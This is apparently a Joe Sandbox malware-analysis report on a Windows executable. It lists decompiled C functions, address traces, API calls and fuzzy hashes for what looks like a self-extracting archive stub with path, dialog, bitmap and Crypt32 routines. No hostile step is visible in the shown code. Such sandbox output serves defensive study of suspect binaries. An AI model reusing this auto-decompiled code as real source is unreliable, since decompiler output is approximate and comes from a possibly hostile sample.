                                                    0x00cdcf3b
                                                    0x00cdcf3e
                                                    0x00cdcf3e
                                                    0x00cdcf3e
                                                    0x00cdcf42
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcf44
                                                    0x00cdcf44
                                                    0x00cdcf4c
                                                    0x00cdcf4d
                                                    0x00cdcf4f
                                                    0x00cdcf52
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcf54
                                                    0x00000000
                                                    0x00cdcf54
                                                    0x00cdcf56
                                                    0x00cdcf61
                                                    0x00cdcf6c
                                                    0x00cdcf71
                                                    0x00cdcf71
                                                    0x00cdcf73
                                                    0x00000000
                                                    0x00cdd009
                                                    0x00cdd009
                                                    0x00cdd00c
                                                    0x00cdd012
                                                    0x00cdd018
                                                    0x00cdd01a
                                                    0x00cdd01a
                                                    0x00cdd024
                                                    0x00cdd024
                                                    0x00000000
                                                    0x00cdd00c

                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 00CDCE9D
                                                      • Part of subcall function 00CCB690: _wcslen.LIBCMT ref: 00CCB696
                                                    • _swprintf.LIBCMT ref: 00CDCED1
                                                      • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                    • SetDlgItemTextW.USER32(?,00000066,00D0946A), ref: 00CDCEF1
                                                    • EndDialog.USER32(?,00000001), ref: 00CDCFFE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                    • String ID: %s%s%u
                                                    • API String ID: 110358324-1360425832
                                                    • Opcode ID: 03e9515718f0bb8d37433a33627376e7694f2ccc35907e510e3b95b038f2ef4f
                                                    • Instruction ID: 807bd98755ab0ea970c7a80d8065f31d362af8fa9e2ceadbc015a0375dfc1671
                                                    • Opcode Fuzzy Hash: 03e9515718f0bb8d37433a33627376e7694f2ccc35907e510e3b95b038f2ef4f
                                                    • Instruction Fuzzy Hash: DE4183B5900259AADF259B90CC85FEE77BCEB04300F4080A7FA09E7251EE709A45DF72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 81%
                                                    			E00CCBB03(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				void* _t32;
				long _t34;
				void* _t40;
				void* _t55;
				signed short* _t62;
				void* _t65;
				intOrPtr _t67;
				signed short* _t68;
				intOrPtr _t69;

				E00CDEC50(0x1000);
				_t68 = _a4;
				_t70 =  *_t68;
				if( *_t68 == 0) {
					L21:
					__eflags = 0;
					return 0;
				}
				E00CCBC98(_t70, _t68);
				_t65 = E00CE3E13(_t68);
				_t32 = E00CCBCC3(_t68);
				_t71 = _t32;
				if(_t32 == 0) {
					_t34 = GetCurrentDirectoryW(0x7ff,  &_v4100);
					__eflags = _t34;
					if(_t34 == 0) {
						goto L21;
					}
					__eflags = _t34 - 0x7ff;
					if(_t34 > 0x7ff) {
						goto L21;
					}
					__eflags = E00CCBD9D( *_t68 & 0x0000ffff);
					if(__eflags == 0) {
						E00CCB690(__eflags,  &_v4100, 0x800);
						_t40 = E00CE3E13( &_v4100);
						_t67 = _a12;
						__eflags = _t67 - _t40 + _t65 + 4;
						if(_t67 <= _t40 + _t65 + 4) {
							goto L21;
						}
						E00CD0602(_a8, L"\\\\?\\", _t67);
						E00CD05DA(__eflags, _a8,  &_v4100, _t67);
						__eflags =  *_t68 - 0x2e;
						if(__eflags == 0) {
							__eflags = E00CCBD9D(_t68[1] & 0x0000ffff);
							if(__eflags != 0) {
								_t68 =  &(_t68[2]);
							}
						}
						L16:
						_push(_t67);
						L5:
						_push(_t68);
						L6:
						_push(_a8);
						E00CD05DA(_t73);
						return 1;
					}
					_t14 = _t65 + 6; // 0x6
					_t67 = _a12;
					__eflags = _t67 - _t14;
					if(_t67 <= _t14) {
						goto L21;
					}
					E00CD0602(_a8, L"\\\\?\\", _t67);
					__eflags = 0;
					_v4096 = 0;
					E00CD05DA(0, _a8,  &_v4100, _t67);
					goto L16;
				}
				if(E00CCBC98(_t71, _t68) == 0) {
					_t55 = 0x5c;
					__eflags =  *_t68 - _t55;
					if( *_t68 != _t55) {
						goto L21;
					}
					_t62 =  &(_t68[1]);
					__eflags =  *_t62 - _t55;
					if( *_t62 != _t55) {
						goto L21;
					}
					_t69 = _a12;
					_t10 = _t65 + 6; // 0x6
					__eflags = _t69 - _t10;
					if(_t69 <= _t10) {
						goto L21;
					}
					E00CD0602(_a8, L"\\\\?\\", _t69);
					E00CD05DA(__eflags, _a8, L"UNC", _t69);
					_push(_t69);
					_push(_t62);
					goto L6;
				}
				_t2 = _t65 + 4; // 0x4
				_t73 = _a12 - _t2;
				if(_a12 <= _t2) {
					goto L21;
				} else {
					E00CD0602(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L5;
				}
			}














                                                    0x00ccbb0b
                                                    0x00ccbb12
                                                    0x00ccbb16
                                                    0x00ccbb1a
                                                    0x00ccbc84
                                                    0x00ccbc84
                                                    0x00000000
                                                    0x00ccbc84
                                                    0x00ccbb21
                                                    0x00ccbb2e
                                                    0x00ccbb30
                                                    0x00ccbb35
                                                    0x00ccbb37
                                                    0x00ccbbc5
                                                    0x00ccbbcb
                                                    0x00ccbbcd
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccbbd3
                                                    0x00ccbbd5
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccbbe4
                                                    0x00ccbbe6
                                                    0x00ccbc2f
                                                    0x00ccbc3b
                                                    0x00ccbc45
                                                    0x00ccbc49
                                                    0x00ccbc4b
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccbc56
                                                    0x00ccbc66
                                                    0x00ccbc6b
                                                    0x00ccbc6f
                                                    0x00ccbc7b
                                                    0x00ccbc7d
                                                    0x00ccbc7f
                                                    0x00ccbc7f
                                                    0x00ccbc7d
                                                    0x00ccbc1d
                                                    0x00ccbc1d
                                                    0x00ccbb62
                                                    0x00ccbb62
                                                    0x00ccbb63
                                                    0x00ccbb63
                                                    0x00ccbb66
                                                    0x00000000
                                                    0x00ccbb6b
                                                    0x00ccbbe8
                                                    0x00ccbbeb
                                                    0x00ccbbee
                                                    0x00ccbbf0
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccbbff
                                                    0x00ccbc04
                                                    0x00ccbc06
                                                    0x00ccbc18
                                                    0x00000000
                                                    0x00ccbc18
                                                    0x00ccbb41
                                                    0x00ccbb74
                                                    0x00ccbb75
                                                    0x00ccbb78
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccbb7e
                                                    0x00ccbb81
                                                    0x00ccbb84
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccbb8a
                                                    0x00ccbb8d
                                                    0x00ccbb90
                                                    0x00ccbb92
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccbba1
                                                    0x00ccbbaf
                                                    0x00ccbbb4
                                                    0x00ccbbb5
                                                    0x00000000
                                                    0x00ccbbb5
                                                    0x00ccbb43
                                                    0x00ccbb46
                                                    0x00ccbb49
                                                    0x00000000
                                                    0x00ccbb4f
                                                    0x00ccbb5a
                                                    0x00ccbb5f
                                                    0x00000000
                                                    0x00ccbb5f

                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00CCBB27
                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00CCA275,?,?,00000800,?,00CCA23A,?,00CC755C), ref: 00CCBBC5
                                                    • _wcslen.LIBCMT ref: 00CCBC3B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$CurrentDirectory
                                                    • String ID: UNC$\\?\
                                                    • API String ID: 3341907918-253988292
                                                    • Opcode ID: 5945574e1961e7a75b20b050424858e9eacdf07f72d8b6d4dd8b4abde3ce30a7
                                                    • Instruction ID: 86516d9a72fcccef30eb83d49653b02d65b0cff0250697f18a1ab372ac35f5de
                                                    • Opcode Fuzzy Hash: 5945574e1961e7a75b20b050424858e9eacdf07f72d8b6d4dd8b4abde3ce30a7
                                                    • Instruction Fuzzy Hash: FD41B431400259B6CF21AFA4CC43FEF77A9AF41391F10446AF965A3151EBB5DF90DA60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDB6DD(void* __ecx, void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t13;
				void* _t15;
				signed int _t20;
				signed int _t21;
				void* _t23;
				void* _t24;
				void* _t28;
				void* _t35;

				_t35 = __fp0;
				_t23 = __edx;
				_t24 = LoadBitmapW( *0xd01028, 0x65);
				_t21 = _t20 & 0xffffff00 | _t24 == 0x00000000;
				if(_t24 != 0) {
					L2:
					GetObjectW(_t24, 0x18,  &_v28);
					L4:
					if(E00CDA5C6(_t31) != 0) {
						if(_t21 != 0) {
							_t28 = E00CDA6C2(0x66);
							if(_t28 != 0) {
								DeleteObject(_t24);
								_t24 = _t28;
							}
						}
						_t13 = E00CDA605(_v20);
						_t15 = E00CDA80C(_t23, _t35, _t24, E00CDA5E4(_v24), _t13);
						DeleteObject(_t24);
						_t24 = _t15;
					}
					return _t24;
				}
				_t24 = E00CDA6C2(0x65);
				_t31 = _t24;
				if(_t24 == 0) {
					_v24 = 0x5d;
					_v20 = 0x12e;
					goto L4;
				}
				goto L2;
			}














                                                    0x00cdb6dd
                                                    0x00cdb6dd
                                                    0x00cdb6f3
                                                    0x00cdb6f7
                                                    0x00cdb6fc
                                                    0x00cdb70b
                                                    0x00cdb712
                                                    0x00cdb728
                                                    0x00cdb72f
                                                    0x00cdb734
                                                    0x00cdb73d
                                                    0x00cdb741
                                                    0x00cdb744
                                                    0x00cdb74a
                                                    0x00cdb74a
                                                    0x00cdb741
                                                    0x00cdb74f
                                                    0x00cdb75f
                                                    0x00cdb767
                                                    0x00cdb76d
                                                    0x00cdb76f
                                                    0x00cdb775
                                                    0x00cdb775
                                                    0x00cdb705
                                                    0x00cdb707
                                                    0x00cdb709
                                                    0x00cdb71a
                                                    0x00cdb721
                                                    0x00000000
                                                    0x00cdb721
                                                    0x00000000

                                                    APIs
                                                    • LoadBitmapW.USER32(00000065), ref: 00CDB6ED
                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00CDB712
                                                    • DeleteObject.GDI32(00000000), ref: 00CDB744
                                                    • DeleteObject.GDI32(00000000), ref: 00CDB767
                                                      • Part of subcall function 00CDA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6D5
                                                      • Part of subcall function 00CDA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6EC
                                                      • Part of subcall function 00CDA6C2: LoadResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA703
                                                      • Part of subcall function 00CDA6C2: LockResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA712
                                                      • Part of subcall function 00CDA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CDB73D,00000066), ref: 00CDA72D
                                                      • Part of subcall function 00CDA6C2: GlobalLock.KERNEL32 ref: 00CDA73E
                                                      • Part of subcall function 00CDA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CDA7A7
                                                      • Part of subcall function 00CDA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00CDA7C6
                                                      • Part of subcall function 00CDA6C2: GlobalFree.KERNEL32 ref: 00CDA7CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                    • String ID: ]
                                                    • API String ID: 1428510222-3352871620
                                                    • Opcode ID: ad008849e1e84113d461527e860f1e63f38dea892afd6105636a8c51435e383b
                                                    • Instruction ID: f467d0c27936611222048fad744141ad3d0d4674a3896fb775dc41710923b7fc
                                                    • Opcode Fuzzy Hash: ad008849e1e84113d461527e860f1e63f38dea892afd6105636a8c51435e383b
                                                    • Instruction Fuzzy Hash: 1801C436500601A7C7217B745D09A6F7A79ABC0752F0A0016FA10A7391DF25CE065272
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E00CDD600(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				intOrPtr _t18;
				void* _t19;
				struct HWND__* _t21;
				signed short _t22;

				_t16 = _a16;
				_t22 = _a12;
				_t21 = _a4;
				_t18 = _a8;
				if(E00CC1316(_t17, _t21, _t18, _t22, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t19 = _t18 - 0x110;
				if(_t19 == 0) {
					 *0xd1fcb4 = _t16;
					SetDlgItemTextW(_t21, 0x66, _t16);
					SetDlgItemTextW(_t21, 0x68,  *0xd1fcb4);
					goto L10;
				}
				if(_t19 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t22 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t21, 0x68,  *0xd1fcb4, 0x800);
					_push(1);
					L7:
					EndDialog(_t21, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










                                                    0x00cdd601
                                                    0x00cdd606
                                                    0x00cdd60b
                                                    0x00cdd610
                                                    0x00cdd628
                                                    0x00cdd68a
                                                    0x00000000
                                                    0x00cdd68c
                                                    0x00cdd62a
                                                    0x00cdd630
                                                    0x00cdd66f
                                                    0x00cdd675
                                                    0x00cdd684
                                                    0x00000000
                                                    0x00cdd684
                                                    0x00cdd635
                                                    0x00cdd644
                                                    0x00000000
                                                    0x00cdd644
                                                    0x00cdd63a
                                                    0x00cdd63d
                                                    0x00cdd661
                                                    0x00cdd667
                                                    0x00cdd64a
                                                    0x00cdd64b
                                                    0x00000000
                                                    0x00cdd64b
                                                    0x00cdd642
                                                    0x00cdd648
                                                    0x00000000
                                                    0x00cdd648
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                      • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                    • EndDialog.USER32(?,00000001), ref: 00CDD64B
                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00CDD661
                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CDD675
                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 00CDD684
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ItemText$DialogWindow
                                                    • String ID: RENAMEDLG
                                                    • API String ID: 445417207-3299779563
                                                    • Opcode ID: 53faf220effbfdcf91c67346304b5ee9f943dc442f52168cbc13d1275bc57451
                                                    • Instruction ID: 8bd6bbc28ddbc0b97e7c700c149778381c7b3983581466ecb2db8af0815c5f71
                                                    • Opcode Fuzzy Hash: 53faf220effbfdcf91c67346304b5ee9f943dc442f52168cbc13d1275bc57451
                                                    • Instruction Fuzzy Hash: 0E012D33648314BAD2214F659D09F57B76DEB6AB02F110816F306E12D0C6A1DA1797F5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CE7E24,?,?,00CE7DC4,?,00CFC300,0000000C,00CE7F1B,?,00000002), ref: 00CE7E93
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CE7EA6
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00CE7E24,?,?,00CE7DC4,?,00CFC300,0000000C,00CE7F1B,?,00000002,00000000), ref: 00CE7EC9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 73149e56f2b0e333254b4e82934bdd506c0be4b7475aa504e9febbca1508735b
                                                    • Instruction ID: f679381e63df317298eb76b13a65c9f3ee617029937832576dcb1c7da6185e33
                                                    • Opcode Fuzzy Hash: 73149e56f2b0e333254b4e82934bdd506c0be4b7475aa504e9febbca1508735b
                                                    • Instruction Fuzzy Hash: 70F04F31A00258BFCB15ABA1DC09BBEBFB4EB44715F0041AAF805A2260DB309F40CA92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CCF2C5(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E00CD081B(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}






                                                    0x00ccf2c6
                                                    0x00ccf2cc
                                                    0x00ccf2d3
                                                    0x00ccf2d8
                                                    0x00ccf2dc
                                                    0x00ccf2f1
                                                    0x00ccf2f4
                                                    0x00ccf2fa
                                                    0x00ccf2fa
                                                    0x00ccf2fd
                                                    0x00000000
                                                    0x00ccf2fd
                                                    0x00ccf302

                                                    APIs
                                                      • Part of subcall function 00CD081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                      • Part of subcall function 00CD081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CCF2E4
                                                    • GetProcAddress.KERNEL32(00D081C8,CryptUnprotectMemory), ref: 00CCF2F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                    • API String ID: 2141747552-1753850145
                                                    • Opcode ID: 377ab341597340c7665a507bc8b4f9a7425c9ab9850eac5f418c093c24e566e6
                                                    • Instruction ID: 7f96bdb2a5efab659707fd71b9d336ac5778cd98872596ca605f7cab9007a85c
                                                    • Opcode Fuzzy Hash: 377ab341597340c7665a507bc8b4f9a7425c9ab9850eac5f418c093c24e566e6
                                                    • Instruction Fuzzy Hash: 99E02630801785BECB209F79D80CB217ED46F04700F14882EF1DA93340CAB0D141DB02
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 63%
                                                    			E00CE2BDA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed char* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed char _t81;
				signed char _t84;
				signed int _t85;
				signed int _t86;
				signed int _t97;
				signed char _t99;
				signed int* _t100;
				signed char* _t103;
				signed int _t109;
				void* _t113;

				_push(0x10);
				_push(0xcfc248);
				E00CDF5F0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t113 + 0x10);
				_t81 = _t52[4];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t99 = _t52[8];
					if(_t99 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t109 =  *(_t113 + 0xc);
						if(_t84 >= 0) {
							_t109 = _t109 + 0xc + _t99;
						}
						 *(_t113 - 4) = _t75;
						_t103 =  *(_t113 + 0x14);
						if(_t84 >= 0 || ( *_t103 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t113 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t103 & 0x00000001;
								if(( *_t103 & 0x00000001) == 0) {
									_t85 =  *(_t54 + 0x18);
									__eflags = _t103[0x18] - _t75;
									if(_t103[0x18] != _t75) {
										__eflags = _t85;
										if(_t85 == 0) {
											goto L32;
										} else {
											__eflags = _t109;
											if(_t109 == 0) {
												goto L32;
											} else {
												__eflags =  *_t103 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t103 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t113 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t85;
										if(_t85 == 0) {
											goto L32;
										} else {
											__eflags = _t109;
											if(_t109 == 0) {
												goto L32;
											} else {
												E00CE0320(_t109, E00CE027C(_t85,  &(_t103[8])), _t103[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t109;
										if(_t109 == 0) {
											goto L32;
										} else {
											E00CE0320(_t109,  *(_t54 + 0x18), _t103[0x14]);
											__eflags = _t103[0x14] - 4;
											if(_t103[0x14] == 4) {
												__eflags =  *_t109;
												if( *_t109 != 0) {
													_push( &(_t103[8]));
													_push( *_t109);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t97 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0xd2205c; // 0x0
							 *((intOrPtr*)(_t113 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0xcf3278();
								_t97 =  *((intOrPtr*)(_t113 - 0x1c))();
								L12:
								if(_t97 == 0 || _t109 == 0) {
									L32:
									E00CE8D24(_t75, _t99, _t103, _t109);
									asm("int3");
									_push(8);
									_push(0xcfc268);
									E00CDF5F0(_t75, _t103, _t109);
									_t100 =  *(_t113 + 0x10);
									_t86 =  *(_t113 + 0xc);
									__eflags =  *_t100;
									if(__eflags >= 0) {
										_t105 = _t86 + 0xc + _t100[2];
										__eflags = _t86 + 0xc + _t100[2];
									} else {
										_t105 = _t86;
									}
									 *(_t113 - 4) =  *(_t113 - 4) & 0x00000000;
									_t110 =  *(_t113 + 0x14);
									_push( *(_t113 + 0x14));
									_push(_t100);
									_push(_t86);
									_t77 =  *((intOrPtr*)(_t113 + 8));
									_push( *((intOrPtr*)(_t113 + 8)));
									_t58 = E00CE2BDA(_t77, _t105, _t110, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00CE38E4(_t105, _t110[0x18], E00CE027C( *((intOrPtr*)(_t77 + 0x18)),  &(_t110[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00CE38F4(_t105, _t110[0x18], E00CE027C( *((intOrPtr*)(_t77 + 0x18)),  &(_t110[8])), 1);
										}
									}
									 *(_t113 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t113 - 0x10));
									return _t61;
								} else {
									 *_t109 = _t97;
									_push( &(_t103[8]));
									_push(_t97);
									L21:
									 *_t109 = E00CE027C();
									L29:
									 *(_t113 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t113 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}





















